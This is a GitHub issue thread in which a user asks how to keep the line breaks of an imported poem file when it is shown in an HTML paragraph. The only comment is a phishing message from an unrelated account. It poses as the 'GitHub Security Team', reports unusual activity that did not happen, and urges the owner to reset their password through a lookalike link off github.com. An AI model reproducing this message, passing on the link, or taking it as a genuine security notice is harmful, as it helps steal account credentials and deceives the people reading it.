### ISSUE TITLE
Need text to come through pre-formatted when imported into an html paragraph

### ISSUE THREAD

**Issue by samuelludwig** [samuelludwig/AST101#1]
Imported text file 'banks.txt' comes through as: 

"Love Poem Serene, In a world full of troubles, i.e. doing nothing about it. - Iain Banks"

instead of:

Love Poem

Serene,
In a world full of troubles,
i.e. doing nothing about it.

- Iain Banks

-----------------------------------------
goal is to rectify this

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for samuelludwig

Hello,

We've detected unusual activity in your GitHub repository. To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
